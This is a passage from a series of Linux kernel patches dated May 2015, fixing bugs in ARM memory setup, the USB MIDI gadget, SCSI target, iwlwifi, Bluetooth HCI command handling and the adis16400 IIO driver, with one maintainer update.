+1112,22 @@ void __init sanity_check_meminfo(void) } /* - * Find the first non-section-aligned page, and point + * Find the first non-pmd-aligned page, and point * memblock_limit at it. This relies on rounding the - * limit down to be section-aligned, which happens at - * the end of this function. + * limit down to be pmd-aligned, which happens at the + * end of this function. * * With this algorithm, the start or end of almost any - * bank can be non-section-aligned. The only exception - * is that the start of the bank 0 must be section- + * bank can be non-pmd-aligned. The only exception is + * that the start of the bank 0 must be section- * aligned, since otherwise memory would need to be * allocated when mapping the start of bank 0, which * occurs before any free memory is mapped. */ if (!memblock_limit) { - if (!IS_ALIGNED(block_start, SECTION_SIZE)) + if (!IS_ALIGNED(block_start, PMD_SIZE)) memblock_limit = block_start; - else if (!IS_ALIGNED(block_end, SECTION_SIZE)) + else if (!IS_ALIGNED(block_end, PMD_SIZE)) memblock_limit = arm_lowmem_limit; } @@ -1137,12 +1137,12 @@ void __init sanity_check_meminfo(void) high_memory = __va(arm_lowmem_limit - 1) + 1; /* - * Round the memblock limit down to a section size. This + * Round the memblock limit down to a pmd size. This * helps to ensure that we will allocate memory from the - * last full section, which should be mapped. + * last full pmd, which should be mapped. */ if (memblock_limit) - memblock_limit = round_down(memblock_limit, SECTION_SIZE); + memblock_limit = round_down(memblock_limit, PMD_SIZE); if (!memblock_limit) memblock_limit = arm_lowmem_limit; From a25a23cc85a28090bf8ab0e750b48e7ab283ba8a Mon Sep 17 00:00:00 2001 From: Pawel Szewczyk Date: Thu, 14 May 2015 14:14:11 +0200 Subject: [PATCH 052/872] usb: gadget: f_midi: fix segfault when reading empty id When midi function is created, 'id' attribute is initialized with SNDRV_DEFAULT_STR1, which is NULL pointer. Trying to read this attribute before filling it ends up with segmentation fault. This commit fix this issue by preventing null pointer dereference. Now f_midi_opts_id_show() returns empty string when id is a null pointer. 
Reproduction path: $ mkdir functions/midi.0 $ cat functions/midi.0/id [ 53.130132] Unable to handle kernel NULL pointer dereference at virtual address 00000000 [ 53.132630] pgd = ec6cc000 [ 53.135308] [00000000] *pgd=6b759831, *pte=00000000, *ppte=00000000 [ 53.141530] Internal error: Oops: 17 [#1] PREEMPT SMP ARM [ 53.146904] Modules linked in: usb_f_midi snd_rawmidi libcomposite [ 53.153071] CPU: 1 PID: 2936 Comm: cat Not tainted 3.19.0-00041-gcf4b216 #7 [ 53.160010] Hardware name: SAMSUNG EXYNOS (Flattened Device Tree) [ 53.166088] task: ee234c80 ti: ec764000 task.ti: ec764000 [ 53.171482] PC is at strlcpy+0x8/0x60 [ 53.175128] LR is at f_midi_opts_id_show+0x28/0x3c [usb_f_midi] [ 53.181019] pc : [] lr : [] psr: 60000053 [ 53.181019] sp : ec765ef8 ip : 00000141 fp : 00000000 [ 53.192474] r10: 00019000 r9 : ed7546c0 r8 : 00010000 [ 53.197682] r7 : ec765f80 r6 : eb46a000 r5 : eb46a000 r4 : ed754734 [ 53.204192] r3 : ee234c80 r2 : 00001000 r1 : 00000000 r0 : eb46a000 [ 53.210704] Flags: nZCv IRQs on FIQs off Mode SVC_32 ISA ARM Segment user [ 53.217907] Control: 10c5387d Table: 6c6cc04a DAC: 00000015 [ 53.223636] Process cat (pid: 2936, stack limit = 0xec764238) [ 53.229364] Stack: (0xec765ef8 to 0xec766000) [ 53.233706] 5ee0: ed754734 ed7546c0 [ 53.241866] 5f00: eb46a000 bf01bed0 eb753b80 bf01cc44 eb753b98 bf01b0a4 bf01b08c c0125dd0 [ 53.250025] 5f20: 00002f19 00000000 ec432e00 bf01cce8 c0530c00 00019000 00010000 ec765f80 [ 53.258184] 5f40: 00010000 ec764000 00019000 c00cc4ac ec432e00 c00cc55c 00000017 000081a4 [ 53.266343] 5f60: 00000001 00000000 00000000 ec432e00 ec432e00 00010000 00019000 c00cc620 [ 53.274502] 5f80: 00000000 00000000 00000000 00010000 ffff1000 00019000 00000003 c000e9a8 [ 53.282662] 5fa0: 00000000 c000e7e0 00010000 ffff1000 00000003 00019000 00010000 00019000 [ 53.290821] 5fc0: 00010000 ffff1000 00019000 00000003 7fffe000 00000001 00000000 00000000 [ 53.298980] 5fe0: 00000000 be8c68d4 0000b995 b6f0e3e6 40000070 00000003 00000000 00000000 [ 53.307157] [] (strlcpy) from [] (f_midi_opts_id_show+0x28/0x3c [usb_f_midi]) [ 53.316006] [] (f_midi_opts_id_show [usb_f_midi]) from [] (f_midi_opts_attr_show+0x18/0x24 ) [ 53.327209] [] (f_midi_opts_attr_show [usb_f_midi]) from [] (configfs_read_file+0x9c/0xec) [ 53.337180] [] (configfs_read_file) from [] (__vfs_read+0x18/0x4c) [ 53.345073] [] (__vfs_read) from [] (vfs_read+0x7c/0x100) [ 53.352190] [] (vfs_read) from [] (SyS_read+0x40/0x8c) [ 53.359056] [] (SyS_read) from [] (ret_fast_syscall+0x0/0x34) [ 53.366513] Code: ebffe3d3 e8bd8008 e92d4070 e1a05000 (e5d14000) [ 53.372641] ---[ end trace e4f53a4e233d98d0 ]--- Signed-off-by: Pawel Szewczyk Signed-off-by: Felipe Balbi --- drivers/usb/gadget/function/f_midi.c | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/drivers/usb/gadget/function/f_midi.c b/drivers/usb/gadget/function/f_midi.c index 259b656c0b3e..6316aa5b1c49 100644 --- a/drivers/usb/gadget/function/f_midi.c +++ b/drivers/usb/gadget/function/f_midi.c @@ -973,7 +973,13 @@ static ssize_t f_midi_opts_id_show(struct f_midi_opts *opts, char *page) int result; mutex_lock(&opts->lock); - result = strlcpy(page, opts->id, PAGE_SIZE); + if (opts->id) { + result = strlcpy(page, opts->id, PAGE_SIZE); + } else { + page[0] = 0; + result = 0; + } + mutex_unlock(&opts->lock); return result; From 63509c60bbc62120fb0e3b287c86ac036b893d90 Mon Sep 17 00:00:00 2001 From: Bart Van Assche Date: Wed, 13 May 2015 09:17:54 +0200 Subject: [PATCH 053/872] target: Fix bidi command handling The function transport_complete_qf() 
must call either queue_data_in() or queue_status() but not both. Signed-off-by: Bart Van Assche Reviewed-by: Christoph Hellwig Signed-off-by: Nicholas Bellinger --- drivers/target/target_core_transport.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c index 3fe5cb240b6f..99a38cf320ff 100644 --- a/drivers/target/target_core_transport.c +++ b/drivers/target/target_core_transport.c @@ -1957,8 +1957,7 @@ static void transport_complete_qf(struct se_cmd *cmd) case DMA_TO_DEVICE: if (cmd->se_cmd_flags & SCF_BIDI) { ret = cmd->se_tfo->queue_data_in(cmd); - if (ret < 0) - break; + break; } /* Fall through for DMA_TO_DEVICE */ case DMA_NONE: From 6c2faeaa0ecc67098106771cba8b7ed1e99a1b5f Mon Sep 17 00:00:00 2001 From: Bart Van Assche Date: Wed, 13 May 2015 09:19:02 +0200 Subject: [PATCH 054/872] target: Add missing parentheses Code like " &= ~CMD_T_BUSY | ..." only clears CMD_T_BUSY but not the other flag. Modify these statements such that both flags are cleared. (Fix fuzz for target_write_prot_action code in mainline - nab) Signed-off-by: Bart Van Assche Reviewed-by: Christoph Hellwig Signed-off-by: Nicholas Bellinger --- drivers/target/target_core_transport.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/target/target_core_transport.c b/drivers/target/target_core_transport.c index 99a38cf320ff..90c92f04a586 100644 --- a/drivers/target/target_core_transport.c +++ b/drivers/target/target_core_transport.c @@ -1770,7 +1770,7 @@ static int target_write_prot_action(struct se_cmd *cmd) sectors, 0, NULL, 0); if (unlikely(cmd->pi_err)) { spin_lock_irq(&cmd->t_state_lock); - cmd->transport_state &= ~CMD_T_BUSY|CMD_T_SENT; + cmd->transport_state &= ~(CMD_T_BUSY|CMD_T_SENT); spin_unlock_irq(&cmd->t_state_lock); transport_generic_request_failure(cmd, cmd->pi_err); return -1; @@ -1868,7 +1868,7 @@ void target_execute_cmd(struct se_cmd *cmd) if (target_handle_task_attr(cmd)) { spin_lock_irq(&cmd->t_state_lock); - cmd->transport_state &= ~CMD_T_BUSY|CMD_T_SENT; + cmd->transport_state &= ~(CMD_T_BUSY | CMD_T_SENT); spin_unlock_irq(&cmd->t_state_lock); return; } From ed65918735a50e1002d856749d3f1f5072f92cfa Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Thu, 30 Apr 2015 09:29:06 +0300 Subject: [PATCH 055/872] iwlwifi: 7000: modify the firmware name for 3165 3165 really needs to load iwlwifi-7265D-13.ucode. This device is supported starting from -13.ucode, update the MIN and OK defines accordingly. While at it, add 3165 to the device list in the Kconfig file. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/Kconfig | 1 + drivers/net/wireless/iwlwifi/iwl-7000.c | 16 ++++++++-------- 2 files changed, 9 insertions(+), 8 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/Kconfig b/drivers/net/wireless/iwlwifi/Kconfig index ab019b45551b..f89f446e5c8a 100644 --- a/drivers/net/wireless/iwlwifi/Kconfig +++ b/drivers/net/wireless/iwlwifi/Kconfig @@ -21,6 +21,7 @@ config IWLWIFI Intel 7260 Wi-Fi Adapter Intel 3160 Wi-Fi Adapter Intel 7265 Wi-Fi Adapter + Intel 3165 Wi-Fi Adapter This driver uses the kernel's mac80211 subsystem. 
diff --git a/drivers/net/wireless/iwlwifi/iwl-7000.c b/drivers/net/wireless/iwlwifi/iwl-7000.c index 36e786f0387b..74ad278116be 100644 --- a/drivers/net/wireless/iwlwifi/iwl-7000.c +++ b/drivers/net/wireless/iwlwifi/iwl-7000.c @@ -70,15 +70,14 @@ /* Highest firmware API version supported */ #define IWL7260_UCODE_API_MAX 13 -#define IWL3160_UCODE_API_MAX 13 /* Oldest version we won't warn about */ #define IWL7260_UCODE_API_OK 12 -#define IWL3160_UCODE_API_OK 12 +#define IWL3165_UCODE_API_OK 13 /* Lowest firmware API version supported */ #define IWL7260_UCODE_API_MIN 10 -#define IWL3160_UCODE_API_MIN 10 +#define IWL3165_UCODE_API_MIN 13 /* NVM versions */ #define IWL7260_NVM_VERSION 0x0a1d @@ -104,9 +103,6 @@ #define IWL3160_FW_PRE "iwlwifi-3160-" #define IWL3160_MODULE_FIRMWARE(api) IWL3160_FW_PRE __stringify(api) ".ucode" -#define IWL3165_FW_PRE "iwlwifi-3165-" -#define IWL3165_MODULE_FIRMWARE(api) IWL3165_FW_PRE __stringify(api) ".ucode" - #define IWL7265_FW_PRE "iwlwifi-7265-" #define IWL7265_MODULE_FIRMWARE(api) IWL7265_FW_PRE __stringify(api) ".ucode" @@ -248,8 +244,13 @@ static const struct iwl_ht_params iwl7265_ht_params = { const struct iwl_cfg iwl3165_2ac_cfg = { .name = "Intel(R) Dual Band Wireless AC 3165", - .fw_name_pre = IWL3165_FW_PRE, + .fw_name_pre = IWL7265D_FW_PRE, IWL_DEVICE_7000, + /* sparse doens't like the re-assignment but it is safe */ +#ifndef __CHECKER__ + .ucode_api_ok = IWL3165_UCODE_API_OK, + .ucode_api_min = IWL3165_UCODE_API_MIN, +#endif .ht_params = &iwl7000_ht_params, .nvm_ver = IWL3165_NVM_VERSION, .nvm_calib_ver = IWL3165_TX_POWER_VERSION, @@ -325,6 +326,5 @@ const struct iwl_cfg iwl7265d_n_cfg = { MODULE_FIRMWARE(IWL7260_MODULE_FIRMWARE(IWL7260_UCODE_API_OK)); MODULE_FIRMWARE(IWL3160_MODULE_FIRMWARE(IWL3160_UCODE_API_OK)); -MODULE_FIRMWARE(IWL3165_MODULE_FIRMWARE(IWL3160_UCODE_API_OK)); MODULE_FIRMWARE(IWL7265_MODULE_FIRMWARE(IWL7260_UCODE_API_OK)); MODULE_FIRMWARE(IWL7265D_MODULE_FIRMWARE(IWL7260_UCODE_API_OK)); From 1aa02b5a33506387828f77eb607342a7dfa6beff Mon Sep 17 00:00:00 2001 From: Avri Altman Date: Wed, 29 Apr 2015 05:11:10 +0300 Subject: [PATCH 056/872] iwlwifi: pcie: don't disable the busmaster DMA clock for family 8000 Disabling the clocks is a standard procedure while stopping the device. On family 8000 however, disabling the bus master DMA clock increases the NIC's power consumption. To fix this, skip this call if the device family is IWL_DEVICE_FAMILY_8000. 
Signed-off-by: Avri Altman Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/pcie/trans.c | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index 47bbf573fdc8..d6f6515fe663 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -1049,9 +1049,11 @@ static void iwl_trans_pcie_stop_device(struct iwl_trans *trans, bool low_power) iwl_pcie_rx_stop(trans); /* Power-down device's busmaster DMA clocks */ - iwl_write_prph(trans, APMG_CLK_DIS_REG, - APMG_CLK_VAL_DMA_CLK_RQT); - udelay(5); + if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) { + iwl_write_prph(trans, APMG_CLK_DIS_REG, + APMG_CLK_VAL_DMA_CLK_RQT); + udelay(5); + } } /* Make sure (redundant) we've released our request to stay awake */ From ba830b3d093580f424fd31b7cd693046a86cf030 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Thu, 14 May 2015 12:11:38 +0300 Subject: [PATCH 057/872] iwlwifi: mvm: fix MLME trigger A few triggers have status = MLME_SUCCESS and they are still interesting. E.g. if we want to collect data upon deauth, the status will be MLME_SUCCESS. Fix that. Fixes: d42f53503406 ("iwlwifi: mvm: add trigger for firmware dump upon MLME failures") Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 3 --- 1 file changed, 3 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 40265b9c66ae..dda9f7b5f342 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -3995,9 +3995,6 @@ static void iwl_mvm_mac_event_callback(struct ieee80211_hw *hw, if (!iwl_fw_dbg_trigger_enabled(mvm->fw, FW_DBG_TRIGGER_MLME)) return; - if (event->u.mlme.status == MLME_SUCCESS) - return; - trig = iwl_fw_dbg_get_trigger(mvm->fw, FW_DBG_TRIGGER_MLME); trig_mlme = (void *)trig->data; if (!iwl_fw_dbg_trigger_check_stop(mvm, vif, trig)) From 1b97937246d8b97c0760d16d8992c7937bdf5e6a Mon Sep 17 00:00:00 2001 From: Russell King Date: Fri, 15 May 2015 11:02:23 +0100 Subject: [PATCH 058/872] ARM: fix missing syscall trace exit Josh Stone reports: I've discovered a case where both arm and arm64 will miss a ptrace syscall-exit that they should report. If the syscall is entered without TIF_SYSCALL_TRACE set, then it goes on the fast path. It's then possible to have TIF_SYSCALL_TRACE added in the middle of the syscall, but ret_fast_syscall doesn't check this flag again. Fix this by always checking for a syscall trace in the fast exit path. 
Reported-by: Josh Stone Signed-off-by: Russell King --- arch/arm/kernel/entry-common.S | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/arch/arm/kernel/entry-common.S b/arch/arm/kernel/entry-common.S index f8ccc21fa032..4e7f40c577e6 100644 --- a/arch/arm/kernel/entry-common.S +++ b/arch/arm/kernel/entry-common.S @@ -33,7 +33,9 @@ ret_fast_syscall: UNWIND(.fnstart ) UNWIND(.cantunwind ) disable_irq @ disable interrupts - ldr r1, [tsk, #TI_FLAGS] + ldr r1, [tsk, #TI_FLAGS] @ re-check for syscall tracing + tst r1, #_TIF_SYSCALL_WORK + bne __sys_trace_return tst r1, #_TIF_WORK_MASK bne fast_work_pending asm_trace_hardirqs_on From cffd2eedf91aa9e459b8640807ee6ea7bd8ee145 Mon Sep 17 00:00:00 2001 From: Frederic Danis Date: Fri, 15 May 2015 11:58:39 +0200 Subject: [PATCH 059/872] Bluetooth: Fix calls to __hci_cmd_sync() Remove test of command reply status as it is already performed by __hci_cmd_sync(). __hci_cmd_sync_ev() function already returns an error if it got a non-zero status either through a Command Complete or a Command Status event. For both of these events the status is collected up in the event handlers called by hci_event_packet() and then passed as the second parameter to req_complete_skb(). The req_complete_skb() callback in turn is hci_req_sync_complete() for __hci_cmd_sync_ev() which stores the status in hdev->req_result. The hdev->req_result is then further converted through bt_to_errno() back in __hci_cmd_sync_ev(). Signed-off-by: Frederic Danis Signed-off-by: Marcel Holtmann --- net/bluetooth/hci_core.c | 5 ----- 1 file changed, 5 deletions(-) diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c index 4663c3dad3f5..db11b9d728b3 100644 --- a/net/bluetooth/hci_core.c +++ b/net/bluetooth/hci_core.c @@ -94,7 +94,6 @@ static ssize_t dut_mode_write(struct file *file, const char __user *user_buf, char buf[32]; size_t buf_size = min(count, (sizeof(buf)-1)); bool enable; - int err; if (!test_bit(HCI_UP, &hdev->flags)) return -ENETDOWN; @@ -121,12 +120,8 @@ static ssize_t dut_mode_write(struct file *file, const char __user *user_buf, if (IS_ERR(skb)) return PTR_ERR(skb); - err = -bt_to_errno(skb->data[0]); kfree_skb(skb); - if (err < 0) - return err; - hci_dev_change_flag(hdev, HCI_DUT_MODE); return count; From 5e13441ca413f5a8d04601d675accb35d37c6b08 Mon Sep 17 00:00:00 2001 From: Frederic Danis Date: Fri, 15 May 2015 11:58:40 +0200 Subject: [PATCH 060/872] Bluetooth: btusb: Fix calls to __hci_cmd_sync() Remove test of command reply status as it is already performed by __hci_cmd_sync(). __hci_cmd_sync_ev() function already returns an error if it got a non-zero status either through a Command Complete or a Command Status event. For both of these events the status is collected up in the event handlers called by hci_event_packet() and then passed as the second parameter to req_complete_skb(). The req_complete_skb() callback in turn is hci_req_sync_complete() for __hci_cmd_sync_ev() which stores the status in hdev->req_result. The hdev->req_result is then further converted through bt_to_errno() back in __hci_cmd_sync_ev(). 
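For context, the caller pattern that this and the following three Bluetooth patches converge on looks roughly like the sketch below. The opcode is a made-up example and the reply handling is trimmed; the point is that IS_ERR() is the only status check a caller still needs:

static int send_example_cmd(struct hci_dev *hdev)
{
	struct sk_buff *skb;

	/* Any non-zero command status has already been converted into an
	 * ERR_PTR() errno by __hci_cmd_sync(), so no skb->data[0] check. */
	skb = __hci_cmd_sync(hdev, 0xfc01 /* hypothetical opcode */, 0, NULL,
			     HCI_INIT_TIMEOUT);
	if (IS_ERR(skb))
		return PTR_ERR(skb);

	/* use skb->data for the reply parameters */
	kfree_skb(skb);
	return 0;
}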
Signed-off-by: Frederic Danis Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btusb.c | 36 ------------------------------------ 1 file changed, 36 deletions(-) diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c index df87016d18ab..b9f282112153 100644 --- a/drivers/bluetooth/btusb.c +++ b/drivers/bluetooth/btusb.c @@ -1577,12 +1577,6 @@ static int btusb_setup_intel(struct hci_dev *hdev) } ver = (struct intel_version *)skb->data; - if (ver->status) { - BT_ERR("%s Intel fw version event failed (%02x)", hdev->name, - ver->status); - kfree_skb(skb); - return -bt_to_errno(ver->status); - } BT_INFO("%s: read Intel version: %02x%02x%02x%02x%02x%02x%02x%02x%02x", hdev->name, ver->hw_platform, ver->hw_variant, @@ -1630,15 +1624,6 @@ static int btusb_setup_intel(struct hci_dev *hdev) return PTR_ERR(skb); } - if (skb->data[0]) { - u8 evt_status = skb->data[0]; - - BT_ERR("%s enable Intel manufacturer mode event failed (%02x)", - hdev->name, evt_status); - kfree_skb(skb); - release_firmware(fw); - return -bt_to_errno(evt_status); - } kfree_skb(skb); disable_patch = 1; @@ -1984,13 +1969,6 @@ static int btusb_setup_intel_new(struct hci_dev *hdev) } ver = (struct intel_version *)skb->data; - if (ver->status) { - BT_ERR("%s: Intel version command failure (%02x)", - hdev->name, ver->status); - err = -bt_to_errno(ver->status); - kfree_skb(skb); - return err; - } /* The hardware platform number has a fixed value of 0x37 and * for now only accept this single value. @@ -2065,13 +2043,6 @@ static int btusb_setup_intel_new(struct hci_dev *hdev) } params = (struct intel_boot_params *)skb->data; - if (params->status) { - BT_ERR("%s: Intel boot parameters command failure (%02x)", - hdev->name, params->status); - err = -bt_to_errno(params->status); - kfree_skb(skb); - return err; - } BT_INFO("%s: Device revision is %u", hdev->name, le16_to_cpu(params->dev_revid)); @@ -2304,13 +2275,6 @@ static void btusb_hw_error_intel(struct hci_dev *hdev, u8 code) return; } - if (skb->data[0] != 0x00) { - BT_ERR("%s: Exception info command failure (%02x)", - hdev->name, skb->data[0]); - kfree_skb(skb); - return; - } - BT_ERR("%s: Exception info %s", hdev->name, (char *)(skb->data + 1)); kfree_skb(skb); From b1f5cf0cae090dae9ac045670fec2d0c5253592a Mon Sep 17 00:00:00 2001 From: Frederic Danis Date: Fri, 15 May 2015 11:58:41 +0200 Subject: [PATCH 061/872] Bluetooth: btintel: Fix calls to __hci_cmd_sync() Remove test of command reply status as it is already performed by __hci_cmd_sync(). __hci_cmd_sync_ev() function already returns an error if it got a non-zero status either through a Command Complete or a Command Status event. For both of these events the status is collected up in the event handlers called by hci_event_packet() and then passed as the second parameter to req_complete_skb(). The req_complete_skb() callback in turn is hci_req_sync_complete() for __hci_cmd_sync_ev() which stores the status in hdev->req_result. The hdev->req_result is then further converted through bt_to_errno() back in __hci_cmd_sync_ev(). 
Signed-off-by: Frederic Danis Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btintel.c | 6 ------ 1 file changed, 6 deletions(-) diff --git a/drivers/bluetooth/btintel.c b/drivers/bluetooth/btintel.c index 2d43d4279b00..828f2f8d1568 100644 --- a/drivers/bluetooth/btintel.c +++ b/drivers/bluetooth/btintel.c @@ -53,12 +53,6 @@ int btintel_check_bdaddr(struct hci_dev *hdev) } bda = (struct hci_rp_read_bd_addr *)skb->data; - if (bda->status) { - BT_ERR("%s: Intel device address result failed (%02x)", - hdev->name, bda->status); - kfree_skb(skb); - return -bt_to_errno(bda->status); - } /* For some Intel based controllers, the default Bluetooth device * address 00:03:19:9E:8B:00 can be found. These controllers are From 43b79209b5be533173eea08535558cf517b334ca Mon Sep 17 00:00:00 2001 From: Frederic Danis Date: Fri, 15 May 2015 11:58:42 +0200 Subject: [PATCH 062/872] Bluetooth: btbcm: Fix calls to __hci_cmd_sync() Remove test of command reply status as it is already performed by __hci_cmd_sync(). __hci_cmd_sync_ev() function already returns an error if it got a non-zero status either through a Command Complete or a Command Status event. For both of these events the status is collected up in the event handlers called by hci_event_packet() and then passed as the second parameter to req_complete_skb(). The req_complete_skb() callback in turn is hci_req_sync_complete() for __hci_cmd_sync_ev() which stores the status in hdev->req_result. The hdev->req_result is then further converted through bt_to_errno() back in __hci_cmd_sync_ev(). Signed-off-by: Frederic Danis Signed-off-by: Marcel Holtmann --- drivers/bluetooth/btbcm.c | 6 ------ 1 file changed, 6 deletions(-) diff --git a/drivers/bluetooth/btbcm.c b/drivers/bluetooth/btbcm.c index 4bba86677adc..728fce38a5a2 100644 --- a/drivers/bluetooth/btbcm.c +++ b/drivers/bluetooth/btbcm.c @@ -55,12 +55,6 @@ int btbcm_check_bdaddr(struct hci_dev *hdev) } bda = (struct hci_rp_read_bd_addr *)skb->data; - if (bda->status) { - BT_ERR("%s: BCM: Device address result failed (%02x)", - hdev->name, bda->status); - kfree_skb(skb); - return -bt_to_errno(bda->status); - } /* The address 00:20:70:02:A0:00 indicates a BCM20702A0 controller * with no configured address. From 110baab1d12836508c68a36cd5bb2e76896f2efd Mon Sep 17 00:00:00 2001 From: Pratyush Anand Date: Thu, 30 Apr 2015 09:46:07 +0530 Subject: [PATCH 063/872] MAINTAINERS: Add Pratyush Anand as SPEAr13xx and DesignWare PCIe maintainer Didn't add myself as Maintainer earlier, as I was moving out of ST and didn't had a board to test. But learnt recently that, it's fine being in MAINTAINERS in such situations, at least I can review the patches. So, let me add myself. 
Signed-off-by: Pratyush Anand Signed-off-by: Bjorn Helgaas Acked-by: Jingoo Han --- MAINTAINERS | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/MAINTAINERS b/MAINTAINERS index 781e099495d3..72674ba8cca5 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -7547,6 +7547,7 @@ F: drivers/pci/host/pci-exynos.c PCI DRIVER FOR SYNOPSIS DESIGNWARE M: Jingoo Han +M: Pratyush Anand L: linux-pci@vger.kernel.org S: Maintained F: drivers/pci/host/*designware* @@ -7560,8 +7561,9 @@ F: Documentation/devicetree/bindings/pci/host-generic-pci.txt F: drivers/pci/host/pci-host-generic.c PCIE DRIVER FOR ST SPEAR13XX +M: Pratyush Anand L: linux-pci@vger.kernel.org -S: Orphan +S: Maintained F: drivers/pci/host/*spear* PCMCIA SUBSYSTEM From 69ca2d771e4e709c5ae1125858e1246e77ef8b86 Mon Sep 17 00:00:00 2001 From: Lars-Peter Clausen Date: Fri, 15 May 2015 17:18:34 +0200 Subject: [PATCH 064/872] iio: adis16400: Report pressure channel scale Add the scale for the pressure channel, which is currently missing. Signed-off-by: Lars-Peter Clausen Fixes: 76ada52f7f5d ("iio:adis16400: Add support for the adis16448") Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/imu/adis16400_core.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/drivers/iio/imu/adis16400_core.c b/drivers/iio/imu/adis16400_core.c index fa795dcd5f75..8de6427121e2 100644 --- a/drivers/iio/imu/adis16400_core.c +++ b/drivers/iio/imu/adis16400_core.c @@ -405,6 +405,11 @@ static int adis16400_read_raw(struct iio_dev *indio_dev, *val = st->variant->temp_scale_nano / 1000000; *val2 = (st->variant->temp_scale_nano % 1000000); return IIO_VAL_INT_PLUS_MICRO; + case IIO_PRESSURE: + /* 20 uBar = 0.002kPascal */ + *val = 0; + *val2 = 2000; + return IIO_VAL_INT_PLUS_MICRO; default: return -EINVAL; } From 7323d59862802ca109451eeda9777024a7625509 Mon Sep 17 00:00:00 2001 From: Paul Cercueil Date: Fri, 15 May 2015 17:18:35 +0200 Subject: [PATCH 065/872] iio: adis16400: Use != channel indices for the two voltage channels Previously, the two voltage channels had the same ID, which didn't cause conflicts in sysfs only because one channel is named and the other isn't; this is still violating the spec though, two indexed channels should never have the same index. 
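A sketch of the channel table shape after the change (the scan indices below are placeholders, not the driver's real values); both entries are .indexed, so they must carry distinct .channel numbers even though only the supply channel has an extend_name:

static const struct iio_chan_spec example_voltage_channels[] = {
	{
		.type = IIO_VOLTAGE,
		.indexed = 1,
		.channel = 0,			/* in_voltage0_supply_raw */
		.extend_name = "supply",
		.info_mask_separate = BIT(IIO_CHAN_INFO_RAW) |
				      BIT(IIO_CHAN_INFO_SCALE),
		.scan_index = 0,		/* placeholder */
	}, {
		.type = IIO_VOLTAGE,
		.indexed = 1,
		.channel = 1,			/* in_voltage1_raw */
		.info_mask_separate = BIT(IIO_CHAN_INFO_RAW) |
				      BIT(IIO_CHAN_INFO_SCALE),
		.scan_index = 1,		/* placeholder */
	},
};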
Signed-off-by: Paul Cercueil Signed-off-by: Lars-Peter Clausen Cc: Signed-off-by: Jonathan Cameron --- drivers/iio/imu/adis16400_core.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/drivers/iio/imu/adis16400_core.c b/drivers/iio/imu/adis16400_core.c index 8de6427121e2..7b63788c7d1c 100644 --- a/drivers/iio/imu/adis16400_core.c +++ b/drivers/iio/imu/adis16400_core.c @@ -459,10 +459,10 @@ static int adis16400_read_raw(struct iio_dev *indio_dev, } } -#define ADIS16400_VOLTAGE_CHAN(addr, bits, name, si) { \ +#define ADIS16400_VOLTAGE_CHAN(addr, bits, name, si, chn) { \ .type = IIO_VOLTAGE, \ .indexed = 1, \ - .channel = 0, \ + .channel = chn, \ .extend_name = name, \ .info_mask_separate = BIT(IIO_CHAN_INFO_RAW) | \ BIT(IIO_CHAN_INFO_SCALE), \ @@ -479,10 +479,10 @@ static int adis16400_read_raw(struct iio_dev *indio_dev, } #define ADIS16400_SUPPLY_CHAN(addr, bits) \ - ADIS16400_VOLTAGE_CHAN(addr, bits, "supply", ADIS16400_SCAN_SUPPLY) + ADIS16400_VOLTAGE_CHAN(addr, bits, "supply", ADIS16400_SCAN_SUPPLY, 0) #define ADIS16400_AUX_ADC_CHAN(addr, bits) \ - ADIS16400_VOLTAGE_CHAN(addr, bits, NULL, ADIS16400_SCAN_ADC) + ADIS16400_VOLTAGE_CHAN(addr, bits, NULL, ADIS16400_SCAN_ADC, 1) #define ADIS16400_GYRO_CHAN(mod, addr, bits) { \ .type = IIO_ANGL_VEL, \ From c2a8b623a089d52c199e305e7905829907db8ec8 Mon Sep 17 00:00:00 2001 From: Paul Cercueil Date: Fri, 15 May 2015 17:18:36 +0200 Subject: [PATCH 066/872] iio: adis16400: Compute the scan mask from channel indices We unfortunately can't use ~0UL for the scan mask to indicate that the only valid scan mask is all channels selected. The IIO core needs the exact mask to work correctly and not a super-set of it. So calculate the masked based on the channels that are available for a particular device. 
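A standalone illustration of the difference between the exact mask and the old ~0UL entry (the channel count is an arbitrary example, not the adis16400's):

#include <stdio.h>

int main(void)
{
	unsigned long exact = 0;
	int scan_index;

	/* OR in one bit per hardware channel, skipping the timestamp */
	for (scan_index = 0; scan_index < 11; scan_index++)
		exact |= 1UL << scan_index;

	printf("exact mask = 0x%lx\n", exact);	/* 0x7ff: only real channels */
	printf("~0UL       = 0x%lx\n", ~0UL);	/* claims bits no channel provides */
	return 0;
}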
